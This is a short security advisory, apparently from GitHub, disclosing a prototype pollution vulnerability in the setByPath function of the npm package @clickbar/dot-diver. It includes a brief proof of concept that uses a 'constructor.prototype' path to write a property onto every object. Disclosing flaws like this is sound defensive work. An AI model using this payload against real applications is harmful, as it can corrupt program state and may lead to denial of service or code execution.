Prototype Pollution(PP) vulnerability in setByPath
Summary There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE. Details //https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277 // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access objectToSet[lastKey] = value In this code, there is no validation for Prototpye Pollution. PoC import { getByPath, setByPath } from '@clickbar/dot-diver' console.log({}.polluted); // undefined setByPath({},'constructor.prototype.polluted', 'foo'); console.log({}.polluted); // foo Impact It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc. Credits Team : NodeBoB 최지혁 ( Jihyeok Choi ) …